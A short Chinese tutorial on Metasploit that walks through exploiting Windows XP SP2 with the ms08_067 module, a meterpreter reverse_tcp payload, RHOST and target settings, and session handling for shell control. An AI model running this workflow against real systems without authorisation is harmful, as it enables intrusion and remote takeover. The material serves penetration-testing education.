metasploit是一款非常好用的渗透测试工具。其中包含了九百多个exploit(攻击模块),两百多个payload(攻击成功之后要执行的一串代码,通常用来做远程控制),是做安全工作必不可少的一款软件。下面展示一个利用该工具渗透microsoft xp sp2的一个过程。
1.进入界面:msfconsole
2.show +两个tab键可以开始查看它自带的攻击模块,show exploits,可以看到九百多个结果。通过search 查找自己需要的。eg:search ms08_067。查询出来之后,用use Name下面的内容使用这个模块。攻击成功之后,set PAYLOAD +payload名字(自己选择合适的)。比如:windows/meterpreter/reverse_tcp是用来建立。设置之后要show options,这样就可以设置一些参数:set RHOST 192.168.1.1,如此类推。然后查看被攻击对象的操作系统:show target,然后set target+相应序号。
3.全部设置完成之后用命令:exploit开始攻击。这样就可以控制被攻击者,可以用help查看可以执行什么命令,比如执行shell命令。
用background将任务放到后台。
ctrl+Z回到msf
用sessions和channel命令回到shell
用exit退出msf